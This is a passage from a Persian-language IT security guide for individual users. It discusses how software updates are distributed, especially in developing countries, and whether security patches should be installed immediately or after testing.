ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻧﺮﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﺩ.
•
ﻛﻠﻮﭘﻬــﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻳــﺎ ﮔﺮﻭﻫﻬــﺎﻱ ﺩﻳﮕــﺮ ﻣــﻲﺗﻮﺍﻧﻨــﺪ
ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ downloadﻛﻨﻨـﺪ ﻭ ﺁﻧﻬـﺎ ﺭﺍ
ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺍﻋﻀﺎ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
•
ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ )ISPﻫـﺎ( ٣١ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺑـــﺴﺘﻪﻫـــﺎﻱ ﺑـــﻪﺭﻭﺯﺭﺳـــﺎﻧﻲ ﻣﺤـــﺼﻮﻻﺕ ﺭﺍﻳـــﺞ ﻭ
ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ ﻣـﺸﺘﺮﻙ ﺭﺍ ﺗﻬﻴـﻪ ﻭ ﺑـﺼﻮﺭﺕ ﻣﺤﻠـﻲ
ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺗﻮﺯﻳـﻊ ﻛﻨﻨـﺪ .ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﻧﻴﺎﺯﻣﻨـﺪﻱ
ISPﻫﺎ ﺑﻪ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻛـﻢ ﻣـﻲﺷـﻮﺩ ﻭ ﻟـﺬﺍ
ﻫﺰﻳﻨﺔ ﺁﻧﻬﺎ ﻧﻴﺰ ﻛﺎﻫﺶ ﻣﻲﻳﺎﺑﺪ.
•
ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ
ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
•
ﺩﺭ ﺳﺎﻝ ۲۰۰۳ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ ﻛـﺮﻡ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺑﺎﻋـﺚ
ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﺷﺪ ،ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ
ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ﺍﻗﺪﺍﻡ ﺑـﻪ ﺗﻮﺯﻳـﻊ ﺑـﺴﺘﻪﻫـﺎﻱ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑـﺮ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﺍﻗـﺪﺍﻡ ﻛـﺮﺩ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﻫﻤﭽﻨﺎﻥ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺩﺍﻣﻪ ﻳﺎﺑﺪ.
ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺮﺍﻱ ﺁﺳﺎﻧﺘﺮ ﺷﺪﻥ ﻛﺎﺭ ﺷﻤﺎ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﻧـﺪ .ﺩﺭ
ﻛﻠﻴﺔ ﻣﻮﺍﺭﺩ ﻭﻇﻴﻔﺔ ﺍﻧﺘﺨﺎﺏ ﺩﻗﻴﻖ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻣـﻮﺭﺩ
ﻧﻴﺎﺯ )ﻛﻪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﺎﺹ ،ﻛﺎﺭ ﭘﻴﭽﻴﺪﻩﺍﻱ
ﺍﺳﺖ( ﺑﻮﺳﻴﻠﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ.
ﻣﺸﻜﻞ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
ﻫﻤــﺎﻧﻄﻮﺭ ﻛــﻪ ﻣــﺸﺎﻫﺪﻩ ﻣــﻲﻛﻨﻴــﺪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺩﺭ ﻣﺤﻴﻂ ﻣﺘﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻃﺮﺍﺣـﻲ
ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﭼﻨــﺪﻳﻦ ﻣﮕﺎﺑــﺎﻳﺘﻲ ﺭﺍ
downloadﻣــﻲﻛﻨﻨــﺪ .ﻟــﺬﺍ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳــﻦ ﺭﻭﺵ ﺗﻨﻬــﺎ ﺩﺭ
ﺻﻮﺭﺗﻲ ﻧﺘﻴﺠﻪﺑﺨﺶ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ ﻛـﻪ ﻳـﻚ ﺍﺭﺗﺒـﺎﻁ ﭘﺮﺳـﺮﻋﺖ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻳـﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﺍﺭﺗﺒـﺎﻁ ﺗﻠﻔﻨـﻲ ﺧـﻮﺩ ﺭﺍ ﺗـﺎ
ﻻ ﺩﺭ ﻛـﺸﻮﺭﻫـﺎﻱ
ﭼﻨﺪﻳﻦ ﺳﺎﻋﺖ ﺑﺮﻗﺮﺍﺭ ﻧﮕﻪ ﺩﺍﺭﻳـﺪ .ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﺩﻭ ﺭﻭﺵ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﻣﺸﻜﻞ ﻣﻮﺟﻮﺩ ﺍﺳﺖ:
.۱
ﺍﺯ ﺧﻴــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻧــﺮﻡﺍﻓــﺰﺍﺭﻫــﺎﻱ ﻛــﺎﺭﺑﺮﺩﻱ ﻭ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺑﮕﺬﺭﻳﺪ.
.۲
ﺍﺯ ﻓــﺮﺩ ﺩﻳﮕــﺮﻱ ﺑﺨﻮﺍﻫﻴــﺪ ﺑــﺴﺘﺔ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍ
downloadﻛﻨﺪ ﻭ ﺟﺰﺋﻴﺎﺕ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻧﺼﺐ ﺭﺍ ﺍﺭﺍﺋﻪ
ﺩﻫﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺴﺘﺔ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ
ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻳﺎ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺗﻮﺯﻳﻊ ﺷﻮﺩ.
ﻫﺮﭼﻨﺪ ﺳﻪ ﺷﻴﻮﺓ ﺍﺧﻴﺮ ﺗﻮﺯﻳﻊ ﺑﺴﺘﻪﻫـﺎﻱ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭼﻨـﺪﺍﻥ
ﺭﺍﻳﺞ ﻧﻴﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳـﻚ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻣـﺆﺛﺮ ﺗﺠـﺎﺭﻱ ﺑـﺮﺍﻱ
ISPﻫﺎ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺗﺒـﺪﻳﻞ
ﺷﻮﻧﺪ .ﺍﮔﺮﭼﻪ ﺍﺯ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺳﺘﻘﺒﺎﻝ ﻣـﻲﺷـﻮﺩ،
ﺍﻣﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﻛـﻪ ﻣﻨـﺎﺑﻊ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ
ﻣﺤﻠﻲ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﻃﻤﻴﻨـﺎﻥ ﻫـﺴﺘﻨﺪ .ﺍﮔـﺮ ﻣﻨـﺎﺑﻊ ﻣﺤﻠـﻲ ﻗﺎﺑـﻞ
ﺍﻃﻤﻴﻨﺎﻥ ﻧﺒﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻣﺮﻛﺰﻱ ﺑﺮﺍﻱ ﺗﻮﺯﻳﻊ ﻭﻳﺮﻭﺳـﻬﺎ
ﻭ ﺗﺮﺍﻭﺍﻫﺎ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ.
Internet Service Providers
31
٦٧
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺁﻳﺎ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﺎﻳﺪ ﭘـﺲ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ،
ﺳﺮﻳﻌ ﹰﺎ ﻧﺼﺐ ﻧﻤﻮﺩ؟
ﺍﻳﻦ ﺑﺤﺚ ﭼﻨﺪﻳﻦ ﺩﻫﻪ ﻣﻴﺎﻥ ﻣﺘﺨﺼﺼﺎﻥ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺟﺮﻳﺎﻥ ﺑـﻮﺩﻩ
ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﻣﺘﻔﺎﻭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﻣﺨﺎﻟﻔــﺎﻥ :ﺍﻣﻜــﺎﻥ ﺩﺍﺭﺩ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﻫﻨﮕــﺎﻡ
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﺷـﻮﻧﺪ ﻳـﺎ ﺑﺨـﺶ ﺩﻳﮕـﺮﻱ ﺍﺯ
ﺑﺮﻧﺎﻣــﻪ ﺭﺍ ﻣﺨﺘــﻞ ﻧﻤﺎﻳﻨــﺪ .ﻫﻤﭽﻨــﻴﻦ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ
ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺍﺻـﻠﻲ
ﺍﺷﻜﺎﻝ ﻭ ﺁﺳﻴﺐﭘـﺬﻳﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﻟـﺬﺍ ﺍﻳـﻦ
ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﺴﺘﺔ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻣـﺸﻜﻼﺕ
ﺟﺪﻳﺪﻱ ﺭﺍ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ ﻛﻪ ﺑﻪ ﻣـﺸﻜﻞ ﻗﺒﻠـﻲ ﺍﺭﺗﺒـﺎﻃﻲ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺍﻧﺘﺸﺎﺭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻛﺸﻒﺷﺪﻩ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﺁﻧﻬﺎ ﻣﻬﺎﺟﻤﺎﻥ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻧﻔـﻮﺫ ﻛـﺮﺩﻩ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺗﺨﺮﻳـﺐ
ﻣﻲﻛﻨﻨﺪ ﺩﺍﻣﻨﺔ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺍﺳﺖ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ
ﻧﻘﺺ ﺍﻣﻨﻴﺘﻲ ﺍﻋﻼﻡ ﻣﻲﺷﻮﺩ -ﺣﺘﻲ ﺍﮔﺮ ﺍﻳﻦ ﺍﻋﻼﻡ ﺗﻮﺳﻂ ﻳﻚ
ﻭﺻﻠﺔ ﺍﻣﻨﻴﺘﻲ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ -ﻣﻬﺎﺟﻤﺎﻥ ﺳﺮﻳﻌﹰﺎ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻧﻘﺺ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ ،ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻣﻤﻜﻦ
ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﺔ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺘﺸﺮﺷﺪﻩ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻨﺪ ﺳﺮﻳﻌﹰﺎ ﻣﻮﺭﺩ ﺗﻬﺎﺟﻢ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﭘﻴﺸﻨﻬﺎﺩ ﻋﻤﻠﻲ:
•
ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻭ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ
ﻏﻴﺮﺣﺴﺎﺱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﺑﺎﻳـﺪ ﻛﻠﻴـﺔ ﺑـﺴﺘﻪﻫـﺎﻱ
ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻌﺪ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ .ﺑﺮﺍﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺸﺪﻩ ،ﺧﻄﺮ ﻣـﺸﻜﻼﺕ ﺟﺪﻳـﺪ
ﺣﺎﺻﻞ ﺍﺯ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺑـﻪ ﻣﺮﺍﺗـﺐ ﻛﻤﺘـﺮ ﺍﺯ
ﺧﻄﺮﺍﺕ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻧﺸﺪﻩ ﺍﺳﺖ.
•
ﻛﺎﺭﺑﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﻭ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ ﻓﻨﻲ ﺑﺎﻳﺪ ﺑـﺴﺘﻪﻫـﺎﻱ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺳﺮﻳﻌﹰﺎ ﻧﺼﺐ ﻛﻨﻨﺪ ،ﺍﻣـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﭼﻪ ﺯﻣـﺎﻧﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ
ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺍﺯ ﺭﻭﻧﺪ ﺻﺤﻴﺢ ﺍﺟﺮﺍ ﺧﺎﺭﺝ ﻛﻨﻨﺪ .ﺑﻪ ﻫﻤﻴﻦ
ﺩﻟﻴﻞ ﺍﮔﺮ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺣﺴﺎﺱ ﺗﺠـﺎﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣــﻲﺷــﻮﺩ ،ﺑﻬﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻳــﻦ ﺍﺳــﺖ ﻛــﻪ ﭘــﻴﺶ ﺍﺯ ﺍﻋﻤــﺎﻝ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺟﺪﻳﺪ ،ﺍﺑﺘـﺪﺍ ﺗﻐﻴﻴـﺮﺍﺕ ﺭﺍ ﺭﻭﻱ ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ
ﻣﺸﺎﺑﻪ ﻭ ﻧﻪﭼﻨﺪﺍﻥ ﺣﻴﺎﺗﻲ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻏﻴﺮﺳﻨﺘﻲ ﻭ ﻏﻴﺮﺗﺠﺎﺭﻱ
ﺩﺭ ﺑﺤﺚ ﻗﺒﻞ ﺑﺮ ﻣﺤﺼﻮﻻﺕ ﺗﺠﺎﺭﻱ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ ﻭ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻋﻤﺪﻩ ﻣﺘﻤﺮﻛﺰ ﺷـﺪﻳﻢ ﻛـﻪ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻣﺤﻴﻄﻬﺎﻱ ﻣﺤﺎﺳﺒﺎﺗﻲ ﻣﺮﺳـﻮﻡ ﻫـﺴﺘﻨﺪ .ﺍﻣـﺎ ﺩﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ
ﺩﻳﮕﺮ ﺷﺮﺍﻳﻂ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺗﻲ ﻣﻲﻛﻨﻨﺪ؟
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻮﭼﻚ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻳـﺎ ﺑـﺎ
ﺣﺪﺍﻗﻞ ﻫﺰﻳﻨﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﺳـﻄﺢ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺗﻔﺎﻭﺗﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﺩ .ﺑﻄﻮﺭ ﻛﻠـﻲ
ﺍﺳــﺘﻔﺎﺩﺓ ﻣﺘﻨــﺎﻭﺏ ﺍﺯ ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍﻳﮕــﺎﻥ ﻭ ﻳــﺎ
ﻻ ﺿﻌﻔﻬﺎﻱ
ﻼ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﻛﻢﻫﺰﻳﻨﻪ ﻛﺎﻣ ﹰ
ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﻧـﺪ ،ﺑﻠﻜـﻪ ﺑـﺮﺍﻱ ﺣـﻞ ﻣـﺸﻜﻼﺕ ﻏﻴﺮﺍﻣﻨﻴﺘـﻲ ﻭ ﻳـﺎ
ﺍﻓﺰﻭﺩﻥ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺪﻳﺪ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ .ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻧﻈﻴﺮ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ٣٢ﻭ ﻳﺎ ﻭﻳﺮﻭﺱﻳﺎﺏ ٣٣ﺩﺭ
ﺣﻴﻄﺔ ﺑﺮﺭﺳﻲ ﻣﺎ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺁﻧﻬـﺎ ﺑﺤـﺚ
ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺍﮔﺮ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ ﻛـﻪ ﺩﺍﺭﺍﻱ ﻛﺎﺭﻛﺮﺩﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ ،ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺖ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺭ
ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩﺍﻳـﺪ .ﻣـﺴﻠﻤﹰﺎ ﻧﻤـﻲﺧﻮﺍﻫﻴـﺪ ﺩﺭ
ﻣﻮﻗﻌﻴﺘﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺣـﺴﺎﺱ ﺑـﻪ ﺍﻣﻨﻴـﺖ
Firewall
Virus Scanner
32
33
ﺑﺨﺶ ﺩﻭﻡ
ﻣﻮﺍﻓﻘﺎﻥ :ﺍﮔﺮ ﺳﺮﻳﻌﹰﺎ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﺭﺍ ﻧـﺼﺐ
ﻛﻨﻴﺪ ،ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺁﺳـﻴﺒﻬﺎﻱ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﺍﻳﻤـﻦ
ﻛﺮﺩﻩﺍﻳـﺪ .ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻤﻨـﻲ ﺣﺎﺻـﻞ ﺍﺯ ﺑـﺴﺘﻪﻫـﺎﻱ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ،ﺗﺎ ﺳـﻄﺤﻲ ﻛـﻪ ﺳﻴـﺴﺘﻢ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ
ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺧـﻮﺩ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻧﻔـﻮﺫ ﻭ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺕ
ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ.
ﺑﻘﻴﺔ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ ﻧـﻮﻉ ﻋﻤﻠﻜـﺮﺩ
ﺁﻧﻬﺎ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﻧﻤﺎﻳﻨﺪ .ﺗﺄﺧﻴﺮ ﭼﻨﺪ ﻫﻔﺘﻪﺍﻱ ﻳﺎ ﭼﻨﺪ ﻣﺎﻫﻪ
ﺩﺭ ﻧﺼﺐ ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺎﺟﺮﺍﺟﻮ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫـﺪ
ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﻧﺼﺐ ﻛﻨﻨﺪ ،ﻣﺸﻜﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ
ﺭﺍ ﻛﺸﻒ ﻭ ﮔﺰﺍﺭﺵ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ -ﭘـﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ
ﺷﻤﺎ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎ ﺭﺍ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ -ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ
ﻓﺮﺻﺖ ﺍﺻﻼﺡ ﻧﻘﺎﻳﺺ ﺟﺪﻳﺪ ﺭﺍ ﺑﺪﻫﻨﺪ.
٦٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
